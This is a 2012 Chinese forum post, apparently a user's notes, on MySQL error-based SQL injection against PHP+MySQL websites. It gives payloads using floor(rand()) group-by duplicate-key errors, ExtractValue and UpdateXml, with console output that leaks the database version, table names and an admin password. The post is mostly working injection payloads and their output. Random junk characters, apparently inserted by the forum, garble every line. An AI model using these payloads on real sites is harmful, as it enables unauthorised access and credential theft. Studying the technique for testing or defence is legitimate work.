放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
# T# J- R. g8 ^" _: x; B3 ^+ p实际测试环境:+ c- m+ D5 h o
2 K' j8 p/ ?; z- k% L/ f j, `. Y/ Q0 V. a9 X
mysql> show tables;
7 U) ]( s9 i# f, I( U+----------------+
4 K& O" K) O$ q$ |% w" S| Tables_in_test |
. }) d/ [7 o0 W- r1 P/ z4 A+----------------+' ^* I8 U1 W7 ^% l
| admin |/ }2 r' W- b; L+ g% a
| article |1 u$ m6 d% T, A$ A( T& g
+----------------+6 i0 U4 Q9 \1 \- S6 @
2 o: D+ H3 a' ]5 e- Z
5 S2 e! ]" ? C/ A* o' p
5 B6 n( r& C# s3 omysql> describe admin;
5 F3 j5 L! e* J& N& |3 M3 {+-------+------------------+------+-----+---------+----------------+
/ c% J, v( t6 L: b9 \| Field | Type | Null | Key | Default | Extra |
* |* w4 D" V7 a3 M/ B+-------+------------------+------+-----+---------+----------------+
" W" r2 T5 S9 i* U2 p( N! X| id | int(10) unsigned | NO | PRI | NULL | auto_increment |( K) r4 s* ]7 O: k' w/ U U
| user | varchar(50) | NO | | NULL | |& y9 x8 U: `+ @, i
| pass | varchar(50) | NO | | NULL | |! O6 ?, e8 I! R3 r2 n3 n$ H: ]
+-------+------------------+------+-----+---------+----------------+ l' y. S8 ^. _+ ?4 [
+ O; V4 b5 m0 i* B" S
5 }$ p; z/ J' r' l8 j+ _. Z 0 H6 J7 `# c0 I8 n
mysql> describe article;/ q; r9 x: |% l( G" l
+---------+------------------+------+-----+---------+----------------+2 B6 }2 D' t( i( @# j- V6 q
| Field | Type | Null | Key | Default | Extra |& d3 ?+ o. ^6 Q) j n8 M" A6 D
+---------+------------------+------+-----+---------+----------------+8 C' v5 u1 Y/ Z5 C
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 T: {( P; q: b! N# S" r2 @
| title | varchar(50) | NO | | NULL | |
6 C2 M" h& z0 u" X0 V7 D# D! {| content | varchar(50) | NO | | NULL | |
. r: _) A) \! O( d' W r c+---------+------------------+------+-----+---------+----------------+7 E% M( d3 `, O, b% I5 a' l; I3 v* m
1、通过floor报错5 h$ G( F) Y2 ^6 n
可以通过如下一些利用代码
$ W* g/ T6 R- k, U- I4 G $ {$ G# }" H: `) m2 U& {
* Z5 q0 Z5 T% Q+ dand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
* r' ]' |5 l& E1 h5 X+ D% afrom information_schema.tables group by x)a);* d4 f# n, k0 q* B% w1 F! S
' J0 N! l) b: q# D' k, A _# N: a 0 G8 d' ]% `3 b4 z0 G. ^
and (select count(*) from (select 1 union select null union select !1)x
. g0 f. n' o- T: b9 _; |group by concat((select table_name from information_schema.tables limit 1),
( V0 R$ Q1 \0 R. I: mfloor(rand(0)*2)));9 Y O: I% [$ r+ K& A
举例如下:
1 ^" V2 l8 a+ }# [0 K- _" l首先进行正常查询:, p4 |+ ?3 w! M( l! J- h$ `1 s
u5 M1 _& F5 p, v6 ]& F" P9 Lmysql> select * from article where id = 1;. V; g/ ]. E4 @4 S
+----+-------+---------+: X( ?! z* ~# ]6 `
| id | title | content |* J% T9 M8 a! X/ r- r, Q. t. B
+----+-------+---------+
0 c" I3 }2 n8 ?, M# G: f| 1 | test | do it |0 m) V; w9 m0 z
+----+-------+---------+
8 C# v% q$ J" h2 K' Z7 q* t. V) s假如id输入存在注入的话,可以通过如下语句进行报错。$ y" H0 w; j8 l; E; K1 L
& Y; a; _/ j. c4 h. C
4 _$ q1 ]7 [+ a5 Y/ g4 p
mysql> select * from article where id = 1 and (select 1 from
; A( H1 s% \# I/ K(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
7 c0 [6 L( H0 d5 u* dERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'6 A) Z. z$ M3 c2 A% \! L2 K
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
: d0 l; Q5 L8 B. Q; o例如我们需要查询管理员用户名和密码:
5 I2 E) A$ L1 J7 e+ T- zMethod1: a% ~3 R" M) Y9 a- r! T5 S# p7 J' @
" D! q) k- p, [) |9 @" c, P" Z
- M& J8 n* _& `/ _# cmysql> select * from article where id = 1 and (select 1 from
2 D I! {; K2 [7 e" K(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x3 i0 ~+ C7 c: L+ [) o
from information_schema.tables group by x)a);
3 p y, a( a% nERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
4 R$ I) v% E( LMethod2:: M/ r* q0 D- m/ F
0 ?! R* i) b( x5 ? , S- R/ X* t6 |
mysql> select * from article where id = 1 and (select count(*)
; d; R: s. a8 K: sfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
2 q k/ O; A8 d; A% G) R$ j6 ifloor(rand(0)*2)));" [- ~7 ~" w$ M" D
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' T; s U3 I3 y7 `
2、ExtractValue
. t8 \2 S+ o7 }: A% m测试语句如下
" h7 \1 x+ S. r1 y4 F" G
2 b% y0 _- I; ~! J8 [ 8 l/ S1 A& k9 v/ m
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
; k7 v2 p& ^: F; o* O# z u4 j实际测试过程+ d5 S; X& p" p* C3 O
# X$ s2 T; B# K) Q- f2 m , z9 i: N1 F. _; ?2 X1 K
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
) V5 S- F* R; B; V# T8 s(select pass from admin limit 1)));--
' H6 s1 U, P! [( `ERROR 1105 (HY000): XPATH syntax error: '\admin888'
! u# \+ P! E0 q& g$ _9 g3、UpdateXml
9 d2 G9 G% f" J+ F4 l测试语句
. t/ G+ |9 s$ J ( j" z. [. [8 L2 c# ?2 b. ~
; \& k7 ~- H& b3 B6 i/ S5 yand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) _) _7 z/ ]. L8 d
实际测试过程6 c% G5 a! ?( L0 H. p4 u
1 f" M1 N) b6 O; Y& W' r3 ~
* r; S' f+ H9 y8 c( Y4 t# |$ t
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,# h" M3 n+ u* N
(select pass from admin limit 1),0x5e24),1));) ]; W( d4 w, Z2 U' K
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
: }* V i3 b+ q! F5 C8 z2 }3 zAll, thanks foreign guys.
7 G5 x, h5 U6 a# l( X% A8 n! M: {
# b. b/ m& _2 ?; U- \7 d, i# S I& L4 Y4 M$ G" [- T( Y& d; v* v9 J6 J& ~" U
|
发表于 2012-12-10 10:28:51
收藏
支持
反对